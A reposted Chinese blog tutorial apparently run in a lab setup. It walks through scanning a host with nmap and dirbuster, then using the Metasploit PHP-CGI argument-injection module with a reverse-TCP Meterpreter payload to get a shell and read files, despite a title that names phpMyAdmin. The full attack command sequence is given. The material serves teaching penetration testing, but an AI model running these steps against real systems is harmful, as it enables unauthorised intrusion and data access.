Metasploit溢出phpMyAdmin漏洞

來源:互聯網
上載者:User

標籤:webshell   瀏覽器   原始碼   地址欄   share   

    利用phpMyAdmin漏洞上傳木馬程式,獲得webshell。

    CGI指令碼沒有正確處理請求參數,導致原始碼泄露,允許遠程攻擊者在請求參數中插入執行命令。


一、利用nmap工具掃描目標主機

1.1使用nmap命令對目標主機進行掃描。單擊案頭空白處,右鍵菜單選擇“在終端中開啟”。


1.2在終端中輸入命令“nmap –sV  192.168.1.3”,對目標主機進行連接埠掃描,發現開放80連接埠。

650) this.width=650;" src="http://s3.51cto.com/wyfs02/M02/8B/56/wKioL1hKMD3hu9atAAFM_tPfjEs447.jpg" style="float:none;" title="1.jpg" alt="wKioL1hKMD3hu9atAAFM_tPfjEs447.jpg" />


1.3在瀏覽器地址欄中輸入“http:\\192.168.1.3”,訪問目標網站。

二、利用dirbuster掃描目標主機

2.1在終端中輸入命令“dirbuster”,啟動軟體對目標網站進行掃描。

2.2在Target URL處輸入“192.168.1.3”,在File with list of dirs./file處選擇字典檔案(/usr/share/dirbuster/wordlists/目錄下),單擊“Start”按鈕,開始掃描。

650) this.width=650;" src="http://s5.51cto.com/wyfs02/M00/8B/59/wKiom1hKMD6gLgktAAJBXeLhjWk333.jpg" style="float:none;" title="2.jpg" alt="wKiom1hKMD6gLgktAAJBXeLhjWk333.jpg" />



2.3掃描結果顯示包含cgi-bin目錄、phpmyadmin目錄等。

650) this.width=650;" src="http://s5.51cto.com/wyfs02/M00/8B/59/wKiom1hKMD_wFgL3AAEPuvVVb5M587.jpg" style="float:none;" title="3.jpg" alt="wKiom1hKMD_wFgL3AAEPuvVVb5M587.jpg" />


三、利用metasploit攻擊目標主機

3.1在終端中輸入命令“msfconsole”,啟動MSF終端。


3.2在終端中輸入命令“search php_cgi”,搜尋php_cgi的相關工具和攻擊載荷。


3.3在終端中輸入命令“use exploit/multi/http/php_cgi_arg_injection”,啟用漏洞利用模組, 提示符就會提示進入到該路徑下。

650) this.width=650;" src="http://s4.51cto.com/wyfs02/M00/8B/56/wKioL1hKMECSFcp4AABvzLI_vck240.jpg" style="float:none;" title="4.jpg" alt="wKioL1hKMECSFcp4AABvzLI_vck240.jpg" />



3.4在終端中輸入命令“show payloads”,顯示Metasploit中可以在遠程主機執行的代碼,即shellcode。

3.5在終端中輸入命令“set PAYLOAD php/meterpreter/reverse_tcp”,設定使用的shellcode代碼。

3.6在終端中輸入“show options”,顯示攻擊模組需要設定的參數。

3.7在終端中輸入“set LHOST 192.168.1.2”,設定源主機的IP地址,用於會話的反向連結。

3.8在終端中輸入“set RHOST 192.168.1.3”,設定目標主機的IP。

650) this.width=650;" src="http://s4.51cto.com/wyfs02/M01/8B/59/wKiom1hKMECi4_scAAAwLWTM-ZA247.jpg" style="float:none;" title="5.jpg" alt="wKiom1hKMECi4_scAAAwLWTM-ZA247.jpg" />

650) this.width=650;" src="http://s4.51cto.com/wyfs02/M00/8B/56/wKioL1hKMEHBzoNCAAD9EyYlPEg494.jpg" style="float:none;" title="6.jpg" alt="wKioL1hKMEHBzoNCAAD9EyYlPEg494.jpg" />



3.9在終端中輸入“exploit”,開始對目標主機進行攻擊。

650) this.width=650;" src="http://s4.51cto.com/wyfs02/M01/8B/56/wKioL1hKMEKjpkR8AAChA5MMct8360.jpg" style="float:none;" title="7.jpg" alt="wKioL1hKMEKjpkR8AAChA5MMct8360.jpg" />



3.10在終端中輸入“sysinfo”,查看系統內容資訊。

3.11在終端中輸入“ls”,顯示目前的目錄下的檔案內容。

650) this.width=650;" src="http://s3.51cto.com/wyfs02/M01/8B/59/wKiom1hKMEPB9A2KAAEC4hvPO1k940.jpg" style="float:none;" title="8jpg.jpg" alt="wKiom1hKMEPB9A2KAAEC4hvPO1k940.jpg" />


3.12在終端中輸入“cat phpinfo.php”,查看檔案內容。

650) this.width=650;" src="http://s3.51cto.com/wyfs02/M01/8B/56/wKioL1hKMESjVon-AAAWhhmfqs0261.jpg" style="float:none;" title="9.jpg" alt="wKioL1hKMESjVon-AAAWhhmfqs0261.jpg" />


本文出自 “12377962” 部落格,請務必保留此出處http://12387962.blog.51cto.com/12377962/1881881

Metasploit溢出phpMyAdmin漏洞

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.